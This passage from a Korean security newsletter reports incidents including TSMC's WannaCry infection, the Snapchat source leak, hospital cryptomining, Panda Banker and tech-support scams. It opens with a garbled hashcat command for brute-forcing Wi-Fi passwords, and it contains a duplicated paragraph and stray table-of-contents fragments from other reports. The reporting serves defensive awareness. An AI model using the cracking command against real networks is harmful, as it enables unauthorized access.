패스워드를얻을수있다. $./hashcat -m test a 3 -w 3 '?l?l?l?l?l?lt!' 이것이바로대상무선네트워크의패스워드이며, 길이와복잡도에따라시간이소요될수있다. 연구원은 현재이기술이어떤업체의라우터나얼마나많은라우터에서적용되는지여부는알수없지만, 우리는로밍기능활성화된모든 i/p/q/r 네트워크 ( 대부분의라우터 ) 에서작동할것이라생각된다. 고밝혔다. 이 WiFI 해킹기술은로밍기능이활성화된네트워크에서만동작하며공격자들은패스워드를브루트포싱해알아낼수있기때문에, 사용자들은해킹이어려운안전한패스워드로 WiFi 네트워크를보호할것을권장한다. 이 WiFi 해킹기술은차세대무선보안프로토콜인 WPA3 에서는동작하지않는다. [ 출처 ]

49 04 해외보안동향 TSMC 칩생산업체, WannaCry 랜섬웨어에감염되었다밝혀 TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware 8 월초, 애플의기기를생산하는 TSMC 공장에서악성코드감염이일어났다. 이들은애플, 퀄콤을포함한거대 기업들의칩을생산하는세계최대칩생산업체다. TSMC 는공격에대한추가적인세부정보를공개했으며, 시스템이악명높은 WannaCry 랜섬웨어에감염되었다고 밝혔다. 이감염으로인해애플의새아이폰을위한칩생산에 TSMC 는큰타격을입게되었다. 영향을받은공장들중일부는 하루종일가동을중단하기도했다. TSMC 의매출에미치는전반적인영향은약 2.56 억달러일것으로추정된다. 또한 TSMC 는이공격에대해타겟공격이아니었으며, 공급업체가 TSMC 의네트워크에바이러스스캐닝이되지 않은감염된소프트웨어를설치했을때 시스템이감염되었다고밝니다. 이악성코드는회사의네트워크를통해급격히확산되어타이난, 신주, 대중등회사의생산공장들중일부의기기 1 만대이상을감염시켰다. TSMC 의 CEO 인 C.C.Wei 는 놀랍고충격적이다. 우리는수만가지도구를설치해왔으나, 이러한감염이발생한것은 이번이처음이다. 고밝혔다. WannaCry 는많은기업들을감염시켰다. 피해를입은기업에는보잉, 르노, 혼다도포함된다. TSMC 는고객의데이터는이공격에영향을받지않았으며, 고객들에게납품이지연될것이라밝혔다. [ 출처 ] 47

50 04 해외보안동향 해커, 스냅챗해킹해소스코드를 GitHub 에공개해 Snapchat Hack Hacker Leaked Snapchat Source Code On GitHub 인기있는소셜미디어앱인스냅챗의소스코드가온라인에유출되었다. 해커는마이크로소프트소유의 GitHub 코드 저장소에소스코드를공개했다. 해커가사용한 GitHub 계정은 i5xx 이며, 사용자의이름은 Khaled Alshehri 이고파키스탄출신이라등록되어있었다. 그는 Source-Snapchat 이라는 GitHub 저장소를생성해스냅챗 ios 앱이라알려진소스코드를게시했다. 이코드는스냅챗메시징앱의전체설계, 앱동작방식, 향후앱에추가될기능등회사의극비정보를누출시킬수 있다. 스냅챗의모기업인 Snap Inc. 는디지털밀레니엄저작권법 (DMCA) 에따라스냅챗의소스코드를호스팅하는 온라인저장소를제거할것을요청했다. 스냅챗해킹 : GitHub, DMCA 통보이후저장소삭제해 이미지출처 : SnapChat 의소스코드에어떤기밀정보가들어있었는지는아직확실하지않지만, 스냅챗측의 DCMA 요청을볼때 회사는매우당황한것으로보인다. 이요청은모두대문자로쓰여있었으며, 따라서저장소의소스코드는진짜인것으로 추측할수있다. 침해당했다주장하는저작권이보호되는원본저작물에대한자세한설명을부탁드립니다. 가능하다면, 온라인에 포스팅된 URL 을포함해주십시오. 라는요청에, 스냅챗의직원은아래와같이답변했다. 48

51 04 해외보안동향 스냅챗소스코드입니다. 이코드는유출되었으며, 한사용자가 GitHub 저장소에업로드했습니다. Snap Inc. 는이를 온라인에공개하지않기때문에 URL 이없습니다. 소스코드전체를모두삭제해주신다면감사하겠습니다. (DCMA 전문 : Snap 은언론에지난 5 월이루어진 ios 업데이트에서 적은양 의 ios 소스코드가노출되었다고전했다. 회사는이 실수를즉시확인후수정했지만, 노출된소스코드중일부가온라인에포스팅되었다. 하지만, Snap 은이소스코드는 제거되었으며이사건이어플리케이션을손상시키지않았으며커뮤니티에아무런영향을미치지않았다고밝혔다. 파키스탄해커, 스냅챗의소스코드를재업로드하겠다협박해스냅챗의소스코드를 GitHub 에유출시킨온라인사용자는오직스냅챗의소스코드를공유할목적으로 GitHub 계정을생성한것으로보인다. 이계정은스냅챗소스코드를게시한것외에는아무런게시물을올리지않았다. 또한 i5xx GitHub 계정의주인인것으로보이는트위터사용자에따르면, 그들은스냅챗에서버그바운티보상을지급할것을요청한것으로나타났다. 하지만스냅챗으로부터아무런연락을받지못해, 그들은스냅챗에서응답할때까지소스코드를재업로드할것이라 밝혔다. DMCA 요청이후스냅챗의소스코드는 GitHub 에서제거된상태이며, 원제작자가코드의소유자임을증명하기전 까지는복원되지않을것이다. 하지만, 이로써문제는완전히해결되지않는다. 스냅챗의소스코드는이미외부인의손에넘어갔기때문에, 다른 온라인포럼에게시되거나개인의이익을위해사용될수있을것이다. [ 출처 ] 49

52 04 해외보안동향 2. 중국 광동, 총칭여러 1 차병원들의서버가해커들의공격받아 광동및총칭의여러 1 차병원들이해커들의공격을받았다. 해커들은브루트포싱으로원격로그인서버를해킹하여 내부정보탈취및마이닝악성코드를심었다. 공격자는 Teamviewer 를위장하여악성코드를유포하였다. 이프로그램들은 50 여개가넘는채굴악성코드프로세스를 탐지할수있으며, 이러한프로세스들이탐지될경우강제로종료시켜서버자원을독점한다. 또한이마이닝악성코드는 레지스트리를수정을통하여 UAC, Windows Defender 등의사용을중지시켜시스템보안기능을무력화시킨다. 샘플을분석한결과공격자들이사용한마이닝악성코드의채굴주소는여러개였으며, 모네로, 이더리움, 제트캐쉬 등등이포함되어있었다. 공격자들은현재까지 20 여만인민폐 ( 약 6600 만원 ) 의부당수익을거둔것으로확인되었다. 통계에따르면, 중국의의료기관들이대부분 22 번포트를열어놓는비율이 50% 가넘으며, 이통계로보았을때 절반이넘는서버가동일한공격을받았을가능성이높다. 알약에서는해당악성코드에대해 Trojan.Agent.Miner 로탐지중이다. [ 출처 ] 50

04 해외보안동향 절강성 1000 만명학생정보블랙마켓에서판매중 8 월 1 일오후, 블랙마켓에절강성학생 1000 만명의정보가공개되었다.

캡쳐화면으로보았을때, 학생들의출생년도는 95~06 으로추정되며, 보호자연락방식및사진도있는것으로보아 판매되고있는데이터가실제데이터일것으로추정된다.

보안전문가들은이렇게유출된정보들은보이스피싱등범죄에사용될수있어주의가필요하다고밝혔다.

53 04 해외보안동향 절강성 1000 만명학생정보블랙마켓에서판매중 8 월 1 일오후, 블랙마켓에절강성학생 1000 만명의정보가공개되었다. 이정보들은절강성내대부분시내의정보들이였으며, 학생이름, 신분증번호, 학번, 고향, 보호자, 보호자신분증번호, 출생지, 학교명등의정보가포함되어있다. 캡쳐화면으로보았을때, 학생들의출생년도는 95~06 으로추정되며, 보호자연락방식및사진도있는것으로보아 판매되고있는데이터가실제데이터일것으로추정된다. 공개된데이터들은초중생들의데이터로, 대학생들의 데이터가포함되어있지않은것으로보아, 절강성초중학교학생관리시스템이해킹당한것으로추정된다. 보안전문가들은이렇게유출된정보들은보이스피싱등범죄에사용될수있어주의가필요하다고밝혔다. 또한만약이번사건이시스템취약점에의해발생된것이라면, 다른성들의시스템에도동일한취약점이존재할수도있다고밝혔다. 하지만블랙마켓에서절강성의데이터만판매되는것으로보아내부직원혹은내부자계정이유출되어이정보들이유출되었을경우도배제할수는없다. 절강성초중학교학생관리시스템은 8 월 1 일부터 6 일까지업데이트를진행했다. [ 출처 ] 51

54 04 해외보안동향 3. 일본 은행을노리지않는 뱅킹트로쟌 도 표적은신용카드와계정, 가상통화도 기존 부정송금악성코드 와 뱅킹트로쟌 으로불려온악성코드가진화를거듭하고있다. 애당초온라인뱅킹을 표적으로하는트로이의목마이기때문에이러한명칭으로불리고는있으나, 온라인뱅킹에서신용카드정보나 계정정보에흥미가이동하고있는공격자도일부있는듯하다. 지금까지온라인뱅킹을표적으로하는악성코드 Dreambot 등, 신용카드나가상통화거래소등에공격대상을 확대하는케이스가보고되고있으나, Panda Banker 에서는은행을전혀타깃으로삼지않고신용카드나계정정보 등을노리는케이스가확인되었다. Panda Banker 는 맨인더브라우저 (MITB) 에의해웹페이지를삽입하여정보를탈취하는악성코드이다 년초반에공격이확인되었다. Zeus 의코드를포함하여 Zeus Panda, PandaBot 등이라고도불리고 있다. 원래해외를중심으로악용되어왔으나, 일본국내를표적으로한공격도 3 월경부터확인되고있다. Arbor Networks 가 3 월에확인하여 ank 라고이름붙여진캠페인에서는일본과미국을대상으로공격을전개했다. 웹인젝션의대상이되는 27 개사이트중, 17 개사이트가일본의금융기관을대상으로하고있으며, 그대부분이신용카드회사였다. 미국에대해서도웹메일과검색엔진, 소셜미디어, 쇼핑사이트등이중심이되고있다. 송신처가되는커맨드 & 컨트롤서버의 URL 에는일본에서신용카드를빼앗았다는사실을의미하는것으로보이는 jpccgrab 등문자열이포함되어있었다. 한편 F5 Networks 에서도 5 월에미국에대한공격과병행하여일본국내신용카드회사를대상으로하는공격캠페인을관측하고있다. 미쓰이스미토모 ( 三井住友 ) 카드, MUFG 카드, 세디나, 오리코, 포켓카드, 세존카드, 이온카드, 라이프카드, 에포스카드, 라쿠텐 ( 楽天 ) 카드, 이데미쓰 ( 出光 ) 카드의신용카드회사 11 개사를타깃으로하고있으며, 더나아가 Facebook, Twitter 의계정정보와어덜트사잍등도표적이되고있다. 한편, 트렌드마이크로가 3 월에관측한 Panda Banker 의변종도신용카드사이트를중심으로계정정보등을 표적으로하고있으며, 온라인뱅킹은표적으로전혀들어있지않았다. 52

55 04 해외보안동향 게다가이회사에서는사취한정보를모아놓은서버에대해서조사를실시한결과, 설정미스로외부에서내부의 데이터를참조할수있는상태로일본국내에서수집한것으로보이는신용카드정보가확인되었다. 이러한서버내부의 정보를확인할수있는케이스는드물다고한다. 데이터베이스에는매일평균 2 건씩정보가추가되고있으며, 가장많을때에 1800 건의신용카드정보가축적되어있었다. 또동시에 100 건이상이데이터베이스에서삭제되는등공격자에의한데이터베이스조작도확인되었다고한다. 사취하고있던정보에는신용카드번호와유효기한, 보안코드뿐아니라생년월일, 사이트인증정보, 비밀질문의답변등도포함된다. 일본신용카드협회의조사에서는일본국내에서 2017 년에 236 억4000 만엔의신용카드에의한부정이용피해가발생하고있어, 2016 년의 142 억엔에서대폭증가하고있다. 그중에서도피해액의약 4 분의 3 에해당하는 176 억7000 만엔은신용카드번호의도용에의한피해로 2016 년의 88 억9000 만엔에서대폭증가했다 년제1 사분기에들어서부터도거의같은수준의피해가발생하고있다. Panda Banker 에관해서는 2 월에가상통화거래소를대상으로하는공격캠페인이이탈리아를중심으로전개되는 등공격대상을확대하고있다. 또온라인뱅킹에관해서도결코악성코드의공격대상에서벗어난것이아니다. MITB 공격으로 패스워드기한종료 등으로표시하여로그인패스워드를재입력시키거나가짜트랜잭션인증의 화면을표시하여인증번호를탈취하는케이스가확인되고있어금융기관등에서주의를당부하고있다. [ 출처 ] 53

56 04 해외보안동향 가짜경고에따라전화를하면서툰일본어를말하는오퍼레이터가등장, 무상소프트나 서포트서비스구입을강요 웹사이트상에서가짜경고화면을표시하고시큐리티소프트구입이나서포트서비스계약으로유도하는수법에관한 상담이 5 월에급증했다고해서독립행정법인정보처리추진기구 (IPA) 가주의를촉구하고있다. 이들수법은웹사이트열람중에 사용하시는컴퓨터는바이러스에감염되어있습니다, Windows 시스템이파손됩니다, 개의시스템문제가발견되었습니다, 초이내에대응하지않으면데이터가전부삭제된다 등팝업이나경고화면을표시하고최종적으로시큐리티소프트를구입하게만들거나서포트서비스계약을하게만드는것이다. 경고메시지를음성으로들려주어열람자의불안을부추기거나정규서비스로보이게만들기위해실재하는기업의로고를화면에표시하고있는경우도있다. 가짜경고화면에따라보안소프트구입으로유도하는수법에관한상담은 4 월이 87 건이었던것에대해 5 월은 225 건으로급증하고, 6 월도 162 건으로비교적많은결과였다. 또서포트서비스의계약으로유도하는수법에관한상담은 4 월이 121 건, 5 월이 187 건, 6 월이 136 건이었다 년말경에는이들 2 개를합한수법에관한상담도확인되었다고한다. 시큐리티소프트를설치하면, 바이러스감염등의문제가있다는진단결과가이소프트상에표시되지만, 실제로 PC 내를 적절하게검사하고있는지는명확하지않다고한다. 그리고 2018 년 7 월 5 일시점에서상담이많은시큐리티소프트 등의명칭은아래와같다. Auto Fixer Pro 2018(Windows) Auto Mechanic 2018(Windows) Speedy PC Pro 2018(Windows) Boost PC Pro 2018(Windows) Identity Protector(Windows) Smart PC Care(Windows) Advanced Mac Cleaner(Mac) Mac Keeper(Mac) 검사결과의문제를해결하기위해서라며신용카드지불로유상시큐리티소프트를구입하도록유도받아성명, 전화번호, 메일주소등의개인정보의입력을요구되는일이확인되고있다. 억지로구입하게된유상판시큐리티소프트를설치하면, 소프트웨어를사용하기위해액티베이트 ( 활성화 ) 가필요하다 고표시되어전화를걸도록유도당한다. 기재된번호에전화를걸면, 서포트업자를사칭하여서툰일본어를하는외국인오퍼레이터가등장한다. 1~2 시간정도원격조작에의한서포트라고칭하는작업을하게된다. 그때다른소프트를설치당하거나하는케이스도있다고한다. 54

57 04 해외보안동향 원격조작을한뒤에는그자리에서실시한서포트작업비와그후연간서포트요금 (1 년 ~3 년정도 ) 의계약을하도록 만든다. 금액은수만엔으로지불수단은신용카드결제나편의점결제가된다. 서포트대응중에전화를일단끊고, 수 시간후에다시전화를걸어계약을하게하는케이스도확인되고있다. [ 출처 ] 55

58 04 해외보안동향 산총연 ( 産総研 ) 에대한부정접속, 직원 ID 약 8000 건에서 PW 시행 평일저녁부터 심야에활동 산업기술종합연구소 ( 이하, 산총연 ) 시스템이 2017 년 10 월부터 2018 년 2 월에걸쳐서부정접속을받은문제로, 산총연은피해상황의조사결과나재발방지책을공표했다. 문제가되는부정접속은 2017 년 10 월 27 일부터 2018 년 2 월 10 일에걸쳐서이루어진것이다. 2 월 6 일에 시스템관리를하는직원이보통사용하지않는일본국내대학의 IP 주소를발신원으로하는로그인이력을눈치채고이 주소를포함한일본국내외에서 41 개계정에대해서부정접속이이루어지고있다는사실을발견, 문제가발각되었다. 산총연에서는 2 월13 일에사태를공표하는동시에피해상황이나재발방지책에대해서조사를실시했다. 업무시스템은 3 월28 일, 인터넷접속은 4월1 일에이미복구가되었다. 산총연에따르면, 이번부정접속은클라우드의메일시스템이나내부시스템에대해서일본국내에있는특정대학의 IP 주소뿐아니라해외 IP 주소를중심으로 155 건의 IP 주소에서이루어지고있었다. 부정접속은평일 16 시반경부터다음날새벽 2 시경에걸쳐서이루어지고있었으며단독이거나몇명규모의동일그룹에서이루어졌을가능성이높은것으로보인다. 직원의로그인ID 가탈취당했을뿐아니라패스워드등이해석되어시스템에대한침입을허가하여파일등을탈취당했다고한다. 구체적으로는직원전원의성명이나소속뿐아니라직원의메일계정 143 건이탈취당해, 첨부파일을포함한메일데이터가취득당했다. 게다가미 ( 未 ) 공표연구정보 120 건을비롯하여공동연구계약에관한정보약 200 건, 개인정보를포함한약 4700 건의서류가유출되었다. 다만유출된정보에비밀보전의필요성이높은것과국가의안전과이익, 연구소의업무나이익에중대한손해를끼치는정보는포함되어있지않다고한다. 구체적으로살펴보면, 메일시스템에대한공격은 2 단계로실시되고있다. 10 월27 일부터연말에걸쳐서이루어진공격에서는패스워드를조사했다. 당초공격자는 ID 와패스워드를조사하고있었는데, 공격자가어떤방법으로전계정의 ID 약 8000 건을입수했다. 1 월부터는이들 ID 를이용하여패스워드의시행이이루어졌다. 게다가 1 월23 일이후는직원이인증에이용하는 LADAP 서버에대하여검색을실시하고있었다. 또한내부시스템에대해서는외부렌탈서버상에설치하고있던연구에이용하는소프트웨어개발작업용웹사이트를경유하여내부시스템에있었던가상머신인내부연구용서버의 OS 를원격조작하여악성코드에감염시켜서발판으로악용했다. 발판이된서버에서관리용네트워크내의서버에접속하여이서버경우로인트라넷의기판시스템에서의직원계정정보를탈취하고있었다고한다. 56

59 04 해외보안동향 산총연에서는피해가확대된원인에대해서매니지먼트의미비외에메일시스템의로그인방법이나외부서버와외부 웹사이트의연계등이유로들었다. 게다가내부네트워크의감시가불충분하여관리용네트워크의서버에접속제한이 없었던점과기기의취약성, 패스워드와암호키의관리등에문제가있었다고설명하고있다. 재발방지에있어서다요소인증의도입이나내부네트워크에서의업무용, 연구용네트워크의분리를실시하고감시를 강화한다. 또조직체제나사업계속계획, 외부위탁체제의재검토를도모하겠다고한다. [ 출처 ] 57

60 ( 주 ) 이스트시큐리티 ( 우 ) 서울시서초구반포대로 3 이스트빌딩

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.